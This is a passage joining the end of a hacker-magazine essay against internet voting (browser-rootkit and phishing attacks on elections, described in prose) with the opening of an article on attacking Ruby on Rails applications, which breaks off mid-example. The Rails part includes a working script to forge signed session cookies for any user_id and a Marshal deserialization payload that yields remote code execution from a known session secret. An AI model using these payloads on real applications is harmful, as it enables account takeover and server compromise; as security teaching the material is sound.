aggressive attacks occurring between countries. If a national election
was being conducted by internet voting, a foreign country would have a
high degree of incentive and desire to disrupt or control the election.

Another speculative but real threat would be a phishing and/or
misinformation attack. For example, in 2012, in Madison, Wisconsin, a U.S.
city, the Republican party sent a mailing to heavily democratic areas
giving them incorrect registration instructions [30]. It's not clear if
this was deliberate or an honest mistake, but it is suspicious, and you
could imagine sending e-mails to people that would cause them to go to the
wrong web-site to vote. It could be an identical look alike to the real
election web-site and either throw their vote way, or even steal their
credentials and use them at the real voting web-site. This is speculative
and it's doubtful an entire election could be rigged this way, but such
tricks could deprive a certain percentage of voters of their voting
rights, and could even tip the balance in an extremely tight race.

It would also be possible to harvest credentials in the weeks before an
election by sending e-mails instructing voters to "enter their credentials
to verify their online voting account." Those credentials could then be
used to vote on election day. Like the misinformation attack, this would
have limited impact but could still affect a tight election and cause
confusion amongst the general population.

Another attack that has been used in real life against voting systems is
the browser rootkit attack, whereby one secretly installs a browser
extension that modifies the behavior of webpages. The Helios voting
system [32] is an open source internet voting system that is designed to
allow users to vote a secret ballot but still verify that the ballot was
received and tallied correctly (source code available at [33]). In other
words, it is a mathematically and cryptographically correct model of
internet voting. Helios uses client side JavaScript extensively, to store
the ballot itself and the Exponential ElGamal encryption used [34] is
implemented in JavaScript. For some of the computationally intensive
crypto procedures are implemented in Java, requiring the JVM to be
installed on the web browser. JavaScript and JVM...  can one ask for a
better attack vector? :>

In the Helios system, candidates are allowed to provide a PDF file
(another fantastic attack vector) that explains their candidacy for
voters to view. So the scheme is probably clear at this point: exploit a
PDF vulnerability to install a malicious browser rootkit as an extension
(they picked Firefox but claim IE would have been just as easy to
attack), which is actually injected into an already installed extension
so the user does not notice a new extension being installed. The browser
rootkit spies on the user's web traffic, and swings into action whenever
the user visits the voting web-site. At that point it has full control
over what the clients does and sees on their end of the voting system.

Researchers Saghar Estehghari and Yvo Desmedt implemented this attack
against Helios. Their complete report is available at [31].

In their case they have Alice running against Bart Preneel, and they want
Alice to win, so she uploads the rootkitted PDF. In this attack, only a
candidate or admin could carry it out because voters cannot upload their
own PDFs to the server.

With the rootkit installed, when a voter votes for Bart, they change the
vote to Alice.  But they modify the confirmation page and plaintext views
of the ballot to show that Bart was voted for, fooling the voter. The last
issue is if the voter decides to verify the ballot, the system will show
the "Encryption doesn't match" message as the result. They fixed this by
changing the verification function to always output "Encryption is
verified," under all circumstances.

This attack could have been distributed through any means and attacked any
system. The point is that as long as every home computer is a potential
voting kiosk, it's not a problem if the election server proves too
difficult to compromise. By hacking the users browser to change votes
behind the scenes, the election can still be manipulated silently. Even a
properly designed voting system can be compromised because the voting
kiosk is not secure.

There exists another problem with the fact that every home computer is now
potentially a voting kiosk. Vote rigging through bribes or intimidation
will once again rise in popularity. This is currently hard to do because
people vote with a secret ballot, in a private booth. No thug can pay them
a bribe knowing that they actually voted for them, nor beat them knowing
that they voted for the wrong person (except for the "voter assistance"
ploy described earlier).  With internet voting, you might simply watch
them vote, or host a "community voting event" at your house, to shake
everyone down.

As a reminder, why focus our scrutiny solely on the potential for outsider
attacks? As I quoted Boss Tweed earlier, as long as those in power
control the insiders counting the votes, they can seldom be stopped. Most
of us know the famous example from the movie "Office Space," where the
company's software is programmed to siphon tiny fractions of every
transaction into a bank account and it then goes horribly wrong. But it
would not be hard at all for some of the programmers of the voting
software to sneak in some code to alter the election (consider the
Estonia incident where the project manager could push changes to the
server at will).


--[ 6 - End-to-End Verifiable Internet Voting Schemes

A cryptographically verifiable voting scheme, Helios, has already been
mentioned in this paper. These schemes try to compensate for the problems
that come with voting over a network composed of untrusted and often
compromised components.  However, it was demonstrated that a browser
rootkit successfully undermines the voting scheme. There are other
systems which go a step farther by using specialized printers to produce
physical, cryptographically signed, receipts.  These schemes are closer
to a DRE machine, since they require the voters to go to a voting
location with specialized equipment, but I want to address the schemes
because they could presumably be networked to the internet to facilitate
in vote aggregation and counting, and because they use internet bulletin
boards to post the proof that the ballots were correctly counted.

One of the best known of these schemes is David Chaum's "Secret Ballot
Receipts: True Voter-Verifiable Elections" scheme [60]. The detailed
cryptography of the scheme is outside of the scope of this paper, but
interested readers should read both Chaum's paper [60], and a
vulnerability analysis of the scheme conducted by Chris Karlof et al.
[61], which identifies key flaws.

In Chaum's scheme, voters receive a physical receipt of their ballot,
which consists of two separately laminated layers.  Put together, the
layers make up a human readable image of the ballot. But each individual
half, alone, appears to be nothing but random black and white pixels.
After the machine prints the receipt, the voter tells the machine which
half they will keep as their proof (this must be done after the machine
has printed the receipt), and shreds the other half at the polling
location. Later, cryptographic material embedded in the layer can be used
by election trustees to tabulate the ballot, and voters can verify that
their vote was counted correctly by locating their receipt on the public
bulletin board.

I am not aware of any proofs that the cryptographic scheme used by Chaum
is flawed, however as Karlof et al. point out, these voting schemes are
implemented on systems with a very wide scope, and there are many
opportunities for flaws in the systems themselves, as well as human
error. The social engineering attacks they present are interesting.
Ordinary citizens do not understand cryptography to enough depth to
generally notice even a very minor alteration in the cryptographic
protocol. For example, if the machine asks the voter which portion of the
receipt the voter wishes to retain (top or
bottom), before printing the signed receipt, the machine can construct
the two receipts to decrypt to an arbitrary ballot of the attacker's
choosing (see [61] for an explanation of why that is).

This is exactly my problem with such schemes. As I explain in the
conclusion, one of the central tenants of democratic elections is that
ordinary citizens see and understand the voting process, and have faith
in the results. Ordinary citizens, including myself, do not understand
these schemes to the appropriate depth to monitor the election and have
faith and understanding in the process. Worse yet, no matter how sound
the math behind the crypto is, the implementation of the crypto
primitives must be absolutely correct. A nation state could easily detect
and take advantage of the most subtle statistical flaws in the
pseudorandom number generation, for example (that is if they had not
already backdoored the key generating hardware used in the election).

Ordinary citizens can watch voters put their ballots into boxes and then
later watch the ballots be removed and counted. Ordinary citizens can see
someone take all the ballot boxes into a secret backroom and later emerge
with them. Ordinary citizens, including myself, cannot look at a
cryptographically signed receipt and say, "Ah, the random number
generation is flawed!". Thus a complicated cryptographic scheme, not well
understood by the general population, is not the way to have trust in
democratic elections.


--[ 7 - Push Back

Despite the number of countries adopting internet voting pilots, there has
also been backlash against electronic voting in general in certain
countries.

In 2007 the Dutch banned the use of their Nedap voting machines [58],
citing the lack of a paper trail. In addition in 2009 Ireland abandoned
their e-voting initiative citing high cost as well as a lack of trust in
the computers' ability to securely tabulate an election [57].

I find Germany's 2009 ban of electronic voting machines the most
interesting however, as many of the German Federal Constitutional Court's
findings coincide with my criticisms of internet voting (note: Germany
banned *electronic* voting machines, not internet voting, but it is still
related).

The German court found that the machines were unconstitutional because the
average citizen could not be expected to understand what the machine was
doing when it tabulated the results (it's a "black box"). In addition,
they considered that in a traditional voting system manipulations and
fraud are far more difficult to execute and carry a significant chance of
detection. However, a bug or deliberate fraud inserted into voting
software would be easy to place and difficult to detect [59].


--[ 8 - But We Use The Internet for [Foo]

One of the common fallacies to support internet voting is that if the
internet is used for other important activities, such as banking and
commerce, why can't it be trusted for voting?  The two main answers are
that online banking is not secret, and that banking fraud can be papered
over with money.

Suppose I go online and send $1,000 to my landlord for rent. The landlord
will see that I sent $1,000, I will see that my account had $1,000
deducted, and the bank will have records of these transactions. I can call
the landlord and confirm that he received the money. If he lied and
claimed he didn't, the bank would still have records of it and so I could
prove that he was paid. If somehow the transaction went badly and the
landlord was paid $2,000, I would see this on my statement and could
demand the money back because my lease dictates the landlord is owed only
$1,000. But with voting, because ballots are secret, this type of
verification would never work. I know I sent a ballot, but I do not know
that it was counted towards whomever I wanted to vote for. I don't even
know that it was counted at all. If this was the landlord example, I
would see that a mystery amount was deducted from my account, have no
idea what my current balance is, and have no way of knowing that landlord
received the money, with neither him nor the bank having records of it.

The other issue is the notion of papering over fraud. When a business
evaluates a piece of technology, the basic question is if the amount of
money saved using the technology outweighs whatever the technology will
cost. The increase in fraud caused by online banking is definitely a cost
of online banking, but it saves banks and consumers so much time and
money, that it makes sense to paper over the problem. That is, when money
is stolen from people's accounts, the banks are willing to just put the
money back in and take the loss, because they still save money. But this
does not work with voting. You cannot paper over a stolen election -- the
election is rigged and the entire country's confidence is ruined (if
anybody even notices that there was fraud).

In e-commerce it is not uncommon at all to allow a spouse or child to use
your credentials to make a purchase. However, it is generally illegal to
allow someone else to vote with your name and ballot. But with internet
voting it is impossible to know when this is happening. Imagine a Silk
Road [15] website being setup for the purpose of selling voting
credentials in exchange for Bitcoins.


--[ 9 - Imagining a More Secure Internet Voting System

The book, Broken Ballots [2], mentions that in 1875 Henry Spratt of
England was granted a U.S. patent on a voting machine. The patent, U.S.
Patent 158,652, claims that it allows "balloting (that is, voting
secretly) without the aid of balls, tickets, passes, letters, figures,
official stamps, or ballot-boxes; second, absolute secrecy, it being
impossible to discover for whom the voter has voted; third, while secrecy
is obtained, all parties, pro and con, can be satisfied the voter has
voted; fourth, at the close of the poll the result of the voting can be
instantly made known; fifth, a complete check as to the numbers voted,
preventing any tampering with the apparatus."

This claim is noteworthy because it remains the central tenant that voting
technology still tries to solve. Of course, we now know that even 140 some
years later, we have not been able to solve this problem.

Matt Bishop describes the properties academia would say an e-voting system
must meet [56], and I've listed the ones I find relevant to this article:

    1) The e-voting system must not be able to associate votes with a
       particular voter
    2) The e-voting system must prevent a voter from casting more than a
       particular number of votes in a race, or one vote per ballot
    3) The voter must be able to verify the votes on the ballot at any
       time until the vote is cast
    4) The e-voting system must tally the votes accurately. Votes must not
       be intentionally or accidentally mis-recorded.
    5) It must be possible to conduct an audit on the reported vote tally,
       using an out-of-band mechanism. A recount cannot be conducted by
       recounting votes on the server because a server with a bug will
       produce a bad recount as well.

I would add a sixth requirement:

    6) Trust. The general population must be able to trust that votes, or
       the count, was not modified at any point in the counting process.

So the question is, could we design a system to meet all of these
requirements? As we saw in the Helios example, there are certainly
mathematical models that can do it. But our computers are so full of areas
to exploit, it's not feasible to do given what we currently know about
designing secure computer systems and I hope the examples I have provided
have convinced you of this fact.


--[ 10 - Conclusion

This article has spent some time discussing internet voting in usage, as
well as its technical shortcomings. But I would like to end on a brief
discussion of the sociology behind democracy. I believe the following:

    1. Internet voting is not compatible with democracy
    2. No amount of technology can change this
    3. Whom you voted for ought to be secret
    4. Who voted should not be secret -- it should be known as widely
       as possible
    5. And who counts the votes, and how, certainly ought not be secret

As I mentioned before, in 1856 a vigilance committee in San Francisco
first found a ballot box with a false bottom, allowing ballots to be
hidden in it and then secretly mixed in with the real ballots before
counting. Ever since people have been trying to counter voter fraud with
technology [2].

Democracy is somewhat miraculous compared to previous forms of government
in that power is transferred smoothly and without violence, even between
opposing factions. This is because people accept that whomever receives
the most votes has a legitimate claim to authority.  If people do not
believe that the votes are legitimate, then they do not believe that the
ruler has legitimate authority, and thus social chaos could ensue.

Further complicating the matter is that votes must be secret, or citizens
can be coerced into voting for certain interests (or willingly bribed).
Because I cannot look into a database and see that a vote from myself was
recorded for candidate Bob in some election, I must inherently trust the
ballot counting process. This means I trust that the organization tallying
the votes (the government) successfully overcomes outside interests
wanting to rig the outcome.

For hundreds of years we have used paper ballots to tally our elections.
Paper ballots are far from perfect, and indeed we have seen instances of
fraud on local scales. However, paper ballots do not have a single failure
point where an entire country's election could be so efficiently
compromised, especially in countries not known for having systemic
corruption. Precinct workers verify who is actually coming to vote and
mark their name as having voted (in many towns the precinct workers will
recognize many of the voters).  The ballots are then counted by people, in
front of other people, in each precinct. These results are then
congregated by district, state, etc. It is a distributed, fault tolerant
system, which relies on human beings faith in a process run by other
humans that they can monitor and understand.

With internet voting, a simple software bug could affect entire precincts,
regions, or countries and be quite difficult to detect.  A maliciously
inserted bug, designed to manipulate an election, could slip through just
as easily and have the same effects. It is very difficult for humans to
know exactly what a computer is doing, especially when every computer on
the internet is a potential voting kiosk.

Thus internet voting is not a case of technology bringing democracy up to
date. It is a case of technology undermining confidence in a process that
must be trusted for elected governments to succeed.  I'm one voter who is
happy to keep casting paper ballots.


--[ 11 - Acknowledgements

Much thanks to Twiga for her time and priceless advice in shaping this
paper. daw provided great insight and background reading on end-to-end
verifiable internet voting.


--[ 12 - References

[1] http://en.wikipedia.org/wiki/United_States_
    presidential_election_in_Florida,_2000
[2] Broken Ballots: Will Your Vote Count?
	Douglas W. Jones & Barbara Simons. 2012.
[6] http://www.emeraldinsight.com/journals.htm?articleid=863987
[7] http://www.cbsnews.com/8301-505124_162-57545531/o
    hio-faces-controversy-over-voting-machines/
[8] http://en.wikipedia.org/wiki/William_M._Tweed
[9] https://jhalderm.com/pub/papers/dcvoting-fc12.pdf
[11] http://www.zdnet.com/probe-says-north-korea-behind-south-
     korean-hack-7000013784/
[15] http://en.wikipedia.org/wiki/Silk_Road_(marketplace)
[17] http://allthingsd.com/20121105/after-sandy-new-jersey-becomes-an-
     unwilling-test-case-for-internet-voting/
[18] http://www.njelections.org/2012-results/directive-email-voting.pdf
[19] http://en.wikipedia.org/wiki/Electronic_voting_examples
     #2000_Arizona_Democratic_presidential_primary_Internet_election
[20] http://www.vvk.ee/public/dok/Internet_Voting_in_Estonia.pdf
[21] http://www.cse.wustl.edu/~jain/cse571-07/ftp/ballots.pdf
[26] http://www.poemhunter.com/poem/the-brus-book-i/
[29] http://online.wsj.com/article/
     SB10001424127887324345804578424741315433114.html
[30] "Election Board Warns About Confusing Mailers."
     http://www.channel3000.com/news/Elections-board-warns-
     about-confusing-mailers/-/1648/16903214/-/2jq57j/-/index.html
[31] http://static.usenix.org/event/evtwote10/tech/full_papers/
     Estehghari.pdf
[32] http://heliosvoting.org/
[33] https://github.com/benadida/helios-server
[34] http://www.win.tue.nl/~berry/papers/euro97.pdf
[35] https://www.schneier.com/essay-101.html
[36] http://www.politico.com/news/stories/1112/84202.html
[38] http://en.wikipedia.org/wiki/Help_America_Vote_Act
[39] http://en.wikipedia.org/wiki/Russian_legislative_election,_2011
     #Electoral_irregularities_and_assessment
[40] http://www.bbc.co.uk/news/world-africa-20660228
[41] http://en.wikipedia.org/wiki/Ballot_box
[42] http://www.bl.uk/onlinegallery/takingliberties/staritems/
     159peoplescharterpic.html
[43] http://homepage.cs.uiowa.edu/~jones/voting/pictures/
[44] http://www.nist.gov/itl/vote/upload/chapter9.pdf
[45] http://demo.intelivote.com/WEBDEMO/
[46] http://www.recorder.ca/2010/10/27/
     technical-snags-wont-be-repeated-intelivote
[47] http://en.wikipedia.org/wiki/DRE_voting_machine
[48] A Survey of Internet Voting:
     http://www.eac.gov/assets/1/Documents/SIV-FINAL.pdf
[49] http://www.systematic-paris-region.org/en/members/oppida
[50] https://en.wikipedia.org/wiki/Short_Message_Service
[51] http://www.everyonecounts.com
[52] http://www.elections.nsw.gov.au/__data/assets/pdf_file/
     0007/93481/iVote_Audit_report_PIR_Final.pdf
[53] http://www.youtube.com/watch?v=ZVWIOwSkMew
[54] http://spectrum.ieee.org/computing/networks/
     geneva-vote-will-use-quantum-cryptography
[56] Bishop, Matt. "An Overview of Electronic Voting and Security."
     Department of Computer Science. University of California, Davis.
[57] http://www.thedailybeast.com/newsweek/2009/05/23/
     we-do-not-trust-machines.html
[58] http://www.theregister.co.uk/2007/10/01/dutch_pull_plug_on_evoting/
[59] http://www.edri.org/edri-gram/number7.5/no-evoting-germany
[60] http://citeseerx.ist.psu.edu/viewdoc/
     download?doi=10.1.1.71.9418&rep=rep1&type=pdf
[61] http://naveen.ksastry.com/papers/cryptovoting-usenix05.pdf

--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x0c of 0x10

|=-----------------------------------------------------------------------=|
|=--------------=[ Attacking Ruby on Rails Applications ]=---------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ joernchen of Phenoelit ]=----------------------=|
|=---------------------=[ joernchen@phenoelit.de ]=----------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

0 - Intro
1 - A Brief Overview
    1.1 - User input
    1.1.1 - POST/PUT/GET application/x-www-form-urlencoded
    1.1.2 - Multiparameter attributes
    1.1.3 - POST/PUT text/xml
    1.1.4 - POST/PUT application/json
    1.1.5 - GET vs. POST/PUT
2 - Common pitfalls
    2.1 - Sessions
    2.2 - to_json / to_xml
    2.3 - Code / Command Execution
        2.3.1 - Classical OS Command Injection
        2.3.2 - eval(user_input) and Friends
        2.3.3 - Indirections
    2.4 - Mass assignments
    2.5 - Regular Expressions
    2.6 - Renderers
    2.7 - Routing
3 - My favourite technique - CVE-2013-3221
4 - Notes on Code Injection Payloads
5 - Greetz and <3
A - References


--[ 0 - Intro

This little article aims to give an introduction to the topic of attacking
Ruby on Rails applications. It's neither complete nor dropping 0day. It's
rather the authors attempt to accumulate the interesting attack paths and
techniques in one write up. As yours truly spend most of his work on Ruby
on Rails applications in the time when Rails version 3 was current, some of
the described techniques are not applicable to Rails 4 any more. However
there is still a broad attack surface of older applications as migrating
Rails code up one or two version appears to be a real pain in the ass for
lager projects (if you doubt this ask your local Rails startup peeps :) ).


--[ 1 - A Brief Overview

Basically Ruby on Rails [0] is a Model-View-Controller (MVC) based web
application framework. It's overloaded with functionality, and this
functionality is what at the end of the day introduces the fine bugs we
all are looking for.

MVC is a software design pattern, which just says roughly the following:

The model is where the data lives, along with the business logic. So the
model is an abstraction to the database. The view is what you see, like
the HTML templates which get rendered. The controller itself is, what you
interact with. It takes requests and decides upon them what to do with the
data which were submitted.

This architecture is reflected in Rails on the file system, a sample
application's directory structure would look like this:

.
|-- app                  |here lives the applications main code
|   |-- assets
|   |   |-- images
|   |   |-- javascripts
|   |   `-- stylesheets
|   |-- controllers      |here live the controllers
|   |-- helpers
|   |-- mailers
|   |-- models           |this is where the models live
|   `-- views            |and finally here are the views
|       `-- layouts
|-- config               |yummy config files
|   |-- environments
|   |-- initializers
|   `-- locales
|-- db
|-- doc
|-- lib                  |more code
|   |-- assets
|   `-- tasks
|-- log
|-- public               |static content
|-- script
|-- test                 | /* */
|   |-- fixtures
|   |-- functional
|   |-- integration
|   |-- performance
|   `-- unit
|-- tmp
|   `-- cache
|       `-- assets
`-- vendor
    |-- assets
    |   |-- javascripts
    |   `-- stylesheets
    `-- plugins          |here might be bugs too

The point of first attention here is the ./app/ directory, this is where
controllers, models and views live.

It has to be noted that the MVC design pattern, even tough it's implied by
the filesystem layout of a fresh Rails application, is not enforced by Ruby
on Rails in any way. For instance a developer might just put parts of the
business logic into the view instead of into the model.


--[ 1.1 - User input

The following sub-sections will cover the various kinds of user input a
Rails application will understand and parse. The most prominent input
vector for a Rails application is usually the params hash, which is
described in detail below.


--[ 1.1.1 - POST/PUT/GET application/x-www-form-urlencoded

The params hash (hash is Ruby slang for an associative array) holds the
request parameters in Rails. So parameters that are POSTed like this:

  username=hacker&password=happy

will yield a params hash like the following:

  params = {"username"=>"hacker","password"=>"happy"}

Lots of magic is involved within Rails' parameter parsing. POST parameters
encoded as application/x-www-form-urlencoded or regular GET parameters can
encode arrays like this:

  user[]=Phrack&user[]=rulez

The resulting params hash is in this case:

  params {"user" => ["Phrack","rulez"]}

Encoding sub-hashes in the params hash is also possible:

  user[name]=hacker&user[password]=happy

The above will result in params being the following:

  params = {"user"=>{"name"=>"hacker","password"=>"happy"}}

Besides strings with the basic GET/POST parameters it is also possible to
encode a Ruby nil value in this way:

  user[name]

by leaving out the = and a value the resulting hash looks like:

  params = {"user"=>{"name"=>nil}}


--[ 1.1.2 - Multiparameter attributes

When a single parameter has to carry multiple values in one attribute those
can be encoded in simple POST and GET requests as well. Those so called
multiparameters look like the following:

  user[mulitparam(1)]=first_val&user[mulitparam(2)]=second_val&[...]
  &user[mulitparam(n)]=nth_val

Also valid is a multiparameter assignment with a single parameter like:

  user[name(1)]=HappyHacker

Internally the values (1)..(n) will be converted into an array and this
array will be assigned to the attribute. This is rarely to be seen in real
world code, however useful for instance when it comes to e.g. timestamps:

  post[date(1)]=1985&post[date(2)]=11&post[date(3)]=17

Where the above example would assign year, month and day of the post[date]
parameter in a multiparameter attribute called date.


--[ 1.1.3 - POST/PUT text/xml

Besides the usual POST/PUT parameters Rails typically also understands XML
input. This however was removed within the Rails 4 release [1].

With XML encoded parameters there are various typecasting possibilities.
Here is an excerpt from the responsible parser
(rails/activesupport/lib/active_support/xml_mini.rb):

  PARSING = {
    "symbol"       => Proc.new { |symbol|  symbol.to_sym },
    "date"         => Proc.new { |date|    ::Date.parse(date) },
    "datetime"     => Proc.new { |time|    ::Time.parse(time).utc rescue
      ::DateTime.parse(time).utc },
    "integer"      => Proc.new { |integer| integer.to_i },
    "float"        => Proc.new { |float|   float.to_f },
    "decimal"      => Proc.new { |number|  BigDecimal(number) },
    "boolean"      => Proc.new { |boolean|
      %w(1 true).include?(boolean.strip) },
    "string"       => Proc.new { |string|  string.to_s },
    "yaml"         => Proc.new { |yaml|    YAML::load(yaml) rescue yaml },
    "base64Binary" => Proc.new { |bin|
      ActiveSupport::Base64.decode64(bin) },
    "binary"       => Proc.new { |bin, entity|
      _parse_binary(bin, entity) },
    "file"         => Proc.new { |file, entity| _parse_file(file, entity) }
  }

  PARSING.update(
    "double"   => PARSING["float"],
    "dateTime" => PARSING["datetime"]
  )

So if a boolean value should be contained in a POSTed variable within the
params hash, this XML POSTed with Content-Type: text/xml will achieve it:

  <user>
    <admin type="boolean">true</admin>
  </user>

The params hash from the above POSTed XML would be:

  params = {"user"=>{"admin"=>true}}

At this point it has to be noted that the conversions for the types
"symbol" and "yaml" have been blacklisted since CVE-2013-0156. This CVE is
actually the most impactful on RoR. Due to YAML being able to create
arbitrary Ruby objects it was possible to gain code execution with just a
single POST request, pretty similar to the sessions issue described in 2.1.
Symbols have been removed from the conversion simply due to the fact, that
they won't get garbage collected a runtime, therefore being useful for e.g.
memory exhaustion attacks.

There are two more supported types which are not listed above, they rather
are defined in
rails/activesupport/lib/active_support/core_ext/hash/conversions.rb. Those
two types are "hash" and "array". A hash is pretty simple to put up in XML.
It needs to be POSTed like this:

  <user>
    <name>hacker</name>
  </user>

The above XML will result in this hash:

  params = {"user"=>{"name"=>"hacker"}}

Arrays with typed XML are assembled together like the following:

  <a type="array">
    <a>some value</a>
    <a>some other value</a>
  </a>

which will yield:

  params = {"a"=>["some value","some other value"]}

Furthermore nil can be encoded this way

  <a nil="true">

which results in this params hash:

  {"a"=>nil}


--[ 1.1.4 - POST/PUT application/json

JSON input POSTed with the Content-Type of application/json can't encode as
many object types as XML, but the following types are defined per the JSON
specification:

* String
* Object (which will be a hash in Ruby)
* Number
* Array
* True
* False
* Null (which will be nil in Ruby)

Before the Rails patches for the CVEs 2013-0333 and 2013-0268 it was
possible to encode arbitrary Objects in JSON, the details on CVE-2013-0333
will be discussed in section 3.3.

With a POST request containing the following JSON payload:

  {"a":["string",1,true,false,null,{"hash":"value"}]}

a params hash of:

  params = {"a"=>["string", 1, true, false, nil, {"hash"=>"value"}]}

will be generated.


--[ 1.1.5 - GET vs. POST/PUT

By default it's even possible to send application/json and text/xml typed
parameters within a GET request, by simply issuing a GET request with an
according Content-Type, a proper Content-Length as well as the actual
request body. For instance:

  curl -X GET http://somerailsapp/ -H "Content-type: application/json" \
  --data '{"a":"z"}'

Additional magic is buried in the _method parameter when used in a POST
request.

For instance the following POST request will be interpreted as PUT:

   curl -X POST http://somerailsapp/?_method=PUT --data 'somedata'

So setting _method in a POST request to a legal HTTP verb will let
Rails interpret the POST as what _method is set to (GET,PUT, etc.).


--[ 2 - Common pitfalls

With the knowledge of various ways to encode our mali^W well crafted input
for a Rails application, let's have a look at patterns of "what could
possibly go wrong?". This section will elaborate some of the nasty side
effects introduced by rather common coding practices in Ruby on Rails. Of
course it will also be explained how to use those side effects in order to
extend the functionality of an affected application.


--[ 2.1 - Sessions

By default Rails stores the sessions client-side within a cookie. The whole
session hash gets serialized (also encrypted in Rails 4) and HMACed (in
Rails 3 and 4) in order to be tamper-resistant.

Since Rails 4.1 the format for serialization used is JSON encoding. Before
that version it used to be Ruby's own serialization format called Marshal.
Marshaled ruby objects look like this:

  irb(main):001:0> foo = ["Some funky string",{"a hash"=>1337}]
  => ["Some funky string", {"a hash"=>1337}]
  irb(main):002:0> Marshal.dump foo
  => "\x04\b[\aI\"\x16Some funky string\x06:\x06ET{\x06I\"\va
  hash\x06;\x00Ti\x029\x05"

It's basically a TLV serialization format, which can encode almost
arbitrary Ruby Objects. The secret key to the HMAC/encryption might be
stored in various locations depending on the Rails version it might be
found in the following files:

* config/environment.rb
* config/initializers/secret_token.rb
* config/secrets.yml
* /proc/self/environ (if it's just given via an ENV variable)

In rare cases it might be found somewhere completely different. But the
best place to look for Rails cookie secrets is Open Source code checked
into public repositories.

Once revealed to a curious hacker the cookie signing/encryption secret
offers a broad amount of fun to have with it.

First of all session tampering is possible, as we are able to sign/encrypt
arbitrary session data. Typically (when no special authentication GEMs are
used) the user_id of the currently logged in user is serialized into the
session. So it's pretty much a piece of cake to serialize the user_id of
any other user into the cookie using the following simple script:

  #!/usr/bin/env ruby
  # Sign a cookie in RoR style (Rails Version <=3.x only)
  require 'base64'
  require 'openssl'
  require 'optparse'

  banner = "Usage: #{$0} -k KEY [-c COOKIE]\n" +
    "Cookie is a raw ruby expression like '{:user_id => 1}'"

  hashtype = 'SHA1'
  key = nil
  cookie = {"user_id"=>1}

  opts = OptionParser.new do |opts|
    opts.banner = banner
    opts.on("-k", "--key KEY") do |h|
      key = h
    end
    opts.on("-c", "--cookie COOKIE") do |w|
      cookie = w
    end
  end

  begin
    opts.parse!(ARGV)
  rescue Exception => e
    puts e, "", opts
    exit
  end

  if key.nil?
    puts banner
    exit
  end

  cook = Base64.strict_encode64(Marshal.dump(eval("#{cookie}"))).chomp

  digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(hashtype),
    key, cook)

  puts("#{cook}--#{digest}")

The secret_token is not only usable for session tampering, it can even be
used for remote command execution. The following Ruby method will generate
a code-executing session cookie (this is Rails 3 specific payload, but
the same principle works with Rails 4 with slight modifications):

  def build_cookie
    code = "eval('whatever ruby code')"
    marshal_payload = Rex::Text.encode_base64(
      "\x04\x08" +
      "o" +
      ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
      "\x07" +
              ":\x0E@instance" +
                      "o" + ":\x08ERB" + "\x06" +
                              ":\x09@src" +
                                      Marshal.dump(code)[2..-1] +
              ":\x0C@method" + ":\x0Bresult"
    ).chomp
    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"),
      SECRET_TOKEN, marshal_payload)
    marshal_payload = Rex::Text.uri_encode(marshal_payload)
    "#{marshal_payload}--#{digest}"
  end

For details on the Rails 4 version and more convenient use of the vector
the exploits/multi/http/rails_secret_deserialization module in Metasploit
is recommend reading/using.

The above code serializes an object in Rubys' Marshal format and then HMACs
the serialized data. The object that is serialized is an instance of
ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy which is
defined as the following:

  class DeprecatedInstanceVariableProxy < DeprecationProxy
    def initialize(instance, method, var = "@#{method}",
        deprecator = ActiveSupport::Deprecation.instance)
      @instance = instance
      @method = method
      @var = var
      @deprecator = deprecator
    end
    private
      def target
        @instance.__send__(@method)
      end

      def warn(callstack, called, args)
        @deprecator.warn(
          "#{@var} is deprecated! Call #{@method}.#{called} instead of " +
          "#{@var}.#{called}. Args: #{args.inspect}", callstack)
      end
  end

DeprecatedInstanceVariableProxy again inherits from DeprecationProxy, which
defines the following interesting method:

  def method_missing(called, *args, &block)
    warn caller, called, args
    target.__send__(called, *args, &block)
  end

as well as undefines some methods:

  instance_methods.each { |m| undef_method m
    unless m =~ /^__|^object_id$/ }

Inside this DeprecatedInstanceVariableProxy an ERB object is placed asA
"instance", and "method" is set to "result". ERB stands for embedded Ruby
and is in RoR to have HTML templates including Ruby code, so basically ERB
is used for the views in a Rails application. The "src" variable for this
ERB object is an arbitrary string of Ruby code. After deserialization and
construction of the two nested objects the following will happen:

The above mentioned interesting method called method_missing is an
expression of Ruby magic. When an object defines a method_missing this
method will be called whenever a method on the object is called which does
not exist (is missing).

As soon as any method on the deserialized object is called, this will be
passed to "method_missing" as (almost) all instance methods have been
undefined. "method_missing" will now first call "warn" and afterwards call
target which will send the method "result" to the ERB object. "result" will
interpret and the code attached in the ERB object as "src".

The following irb snippet demonstrates this behavior:

  1.9.3p194 :001 > require 'rails/all'
   => true
  1.9.3p194 :002 > Marshal.load(
  "\u0004\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+
  "\a:\u000E@instanceo:\bERB\u0006:\t@srcI\"\u0018eval('puts \"ohai\"')"+
  "\u0006:\u0006ET:\f@method:\vresult")
  ohai
   => nil

Credits for the above technique go to Charlie Somerville.

Since Rails 4.1 this vector is not usable anymore, due to the fact that
JSON encoding is used to serialize the session. Actually thats not entirely
true, as there is of course backward compatibility for legacy session
cookies. Those legacy cookies are taken into account if in a Rails App >=
Version 4.1 a secret_token is defined together with the new
secret_key_base. Or if there is only a secret_token but no secret_key_base,
which might be the case if you upgrade your App from Rails 3.something to
4.1 or later. You can tell that you're dealing with a legacy cookie if the
cookie value starts with "BAh" which Base64 decodes to the Marshal header.

If the session's secret is not known, there is still some room to fail, so
for example let's say an appliance by BigVendor has a RoR Webinterface, and
additionally stores the currently logged in users' ID in the session. Now
the BigVendor has a little problem if the session secret is the same on all
appliances. If user admin A of appliance A' has a session cookie for it's
user_id 1 on A', it's a legit session cookie for appliance B' where admin B
has user_id 1 as well (the ID is typically incremental starting from 1 and
admin is usually created first). To paraphrase this: "What has been HMACed
cannot be un-HMACED".


--[ 2.2 - to_json / to_xml

Within Rails the scaffolding process generates automatic XML and JSON
renderers. Those include by default all attributes of the model. A neat
showcase for this behavior is documented in [3] where a simple
authenticated request of http://demo.fatfreecrm.com/users/1.json yielded
the following json output:

  {

    "user": {
        "admin": true,
        "aim": "",
        "alt_email": "",
        "company": "example",
